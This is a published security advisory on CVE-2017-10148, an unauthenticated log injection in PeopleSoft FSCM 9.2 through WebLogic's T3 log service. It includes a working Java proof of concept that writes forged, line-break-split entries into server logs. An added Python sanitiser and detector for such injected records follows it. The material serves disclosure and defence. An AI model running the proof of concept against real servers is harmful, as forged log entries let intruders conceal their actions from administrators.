Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Anonymous log injection
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Log injection
Risk: High
Impact: Forged log events, concealment of actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148
CVSS Information
CVSS Base Score v3: 5.8 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
AV: Attack Vector (Related exploit range): Network (N)
AC: Attack Complexity (Required attack complexity): Low (L)
PR: Privileges Required (Level of privileges needed to exploit): None (N)
UI: User Interaction (Required user participation): None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component): Changed (C)
C: Impact to Confidentiality: None (N)
I: Impact to Integrity: Low (L)
A: Impact to Availability: None (N)
VULNERABILITY DESCRIPTION
An unauthenticated attacker can send a crafted T3 request that writes attacker-controlled data, including line breaks, into the server's log files.
VULNERABLE PACKAGES
PeopleSoft FSCM 9.2
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU July 2017.
TECHNICAL DESCRIPTION
Proof of Concept
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.rmi.PortableRemoteObject;
import weblogic.common.T3ServicesDef;

// Opens an anonymous JNDI/T3 connection and writes through the T3 log service.
// The CR/LF in each message is passed through unchanged, so every call
// produces what looks like two separate entries in the server log.
static boolean anon_log_injection(String PS_SERVER_IP, String PS_SERVER_PORT) throws NamingException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic.common.T3Services");
    Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
    T3ServicesDef h = (T3ServicesDef) o;
    h.log().log("ERPScan_1\n\rERPScan_2");
    h.log().info("ERPScan_3\n\rERPScan_4");
    h.log().error("ERPScan_5\n\rERPScan_6");
    h.log().warning("ERPScan_7\n\rERPScan_8");
    h.log().debug("ERPScan_9\n\rERPScan_10");
    return false;
}
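The proof of concept works because the message reaches the log sink with its CR/LF intact, so one call yields what reads as two log lines. As an added example that is not part of the advisory, of ERPScan's code or of Oracle's code, the Python below shows the two halves of the defence a practitioner would want: a sanitiser that neutralises line breaks and control characters before a message is written, and a checker that parses WebLogic-style server-log text (records begin with "####<") and flags records carrying the carriage returns or embedded record-start markers such an injection leaves behind. Python is used because the check runs over log files outside the server. The sample log is constructed; its host, thread and message-id values are illustrative and the record layout is only assumed to follow the standard server-log format.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Characters that must never reach a log line unescaped. \t (0x09), \n (0x0a)
# and \r (0x0d) are excluded here: \r and \n are handled separately and \t is
# common in legitimate stack traces.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def sanitize_log_message(msg: str) -> str:
    """Mitigation side: escape CR, LF and other control characters so a
    caller-supplied message can never start a new line in the log."""
    msg = msg.replace("\r", "\\r").replace("\n", "\\n")
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group(0)), msg)


@dataclass
class LogRecord:
    header: str                 # the line that starts with "####<"
    continuation: List[str]     # following lines that do not start with "####<"
    reasons: List[str] = field(default_factory=list)


def parse_weblogic_log(text: str) -> List[LogRecord]:
    """Split server-log text into records. Splits on LF only, so an injected
    CR stays inside the record where the checker can see it."""
    lines = text.split("\n")
    if lines and lines[-1] == "":
        lines.pop()             # trailing newline, not an empty continuation line
    records: List[LogRecord] = []
    for line in lines:
        if line.startswith("####<"):
            records.append(LogRecord(header=line, continuation=[]))
        elif records:
            records[-1].continuation.append(line)
    return records


def suspicious_records(records: List[LogRecord]) -> List[LogRecord]:
    """Detection side: flag records that carry traces of line-break injection.
    A forged record that is perfectly formed and LF-terminated is parsed as a
    record of its own and cannot be told apart here, which is why the
    sanitiser above has to run before the message is written."""
    flagged = []
    for rec in records:
        body = "\n".join([rec.header, *rec.continuation])
        reasons = []
        if "\r" in body:
            reasons.append("carriage return inside record")
        if any("####<" in line for line in rec.continuation):
            reasons.append("record-start marker inside message body")
        if CONTROL_CHARS.search(body):
            reasons.append("other control character inside record")
        if reasons:
            rec.reasons = reasons
            flagged.append(rec)
    return flagged


# Constructed sample: two benign records (the second is a legitimate multi-line
# stack trace) followed by one record written through the injection path with
# the "\n\r" payload from the advisory. Host, thread and message-id values are
# illustrative, not taken from a real system.
SAMPLE_LOG = (
    "####<Mar 16, 2017 10:00:01 AM CET> <Info> <Security> <pshost> <PIA> "
    "<[ACTIVE] ExecuteThread: '0'> <<WLS Kernel>> <> <> <1489654801000> "
    "<BEA-000000> <Security service started.>\n"
    "####<Mar 16, 2017 10:00:05 AM CET> <Error> <HTTP> <pshost> <PIA> "
    "<[ACTIVE] ExecuteThread: '1'> <<anonymous>> <> <> <1489654805000> "
    "<BEA-000000> <Servlet failed with exception\n"
    "java.lang.NullPointerException\n"
    "\tat com.example.Servlet.service(Servlet.java:123)>\n"
    "####<Mar 16, 2017 10:00:09 AM CET> <Error> <T3Services> <pshost> <PIA> "
    "<[ACTIVE] ExecuteThread: '2'> <<anonymous>> <> <> <1489654809000> "
    "<BEA-000000> <ERPScan_5\n"
    "\rERPScan_6>\n"
)


if __name__ == "__main__":
    for rec in suspicious_records(parse_weblogic_log(SAMPLE_LOG)):
        print("SUSPICIOUS:", rec.header[:60], "...", "; ".join(rec.reasons))
    print("sanitised:", sanitize_log_message("ERPScan_1\n\rERPScan_2"))
```

Run against the sample, the checker flags only the third record (its continuation line begins with the injected carriage return), while the genuine stack trace passes because tabs and plain LF continuation lines are normal in a server log. The sanitiser is the fix that belongs in any logging wrapper that accepts caller-supplied strings: the escaped form keeps the original text readable while making it impossible for a message to open a new record.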
The post [ERPSCAN-17-042] Anonymous log injection in FSCM appeared first on ERPScan.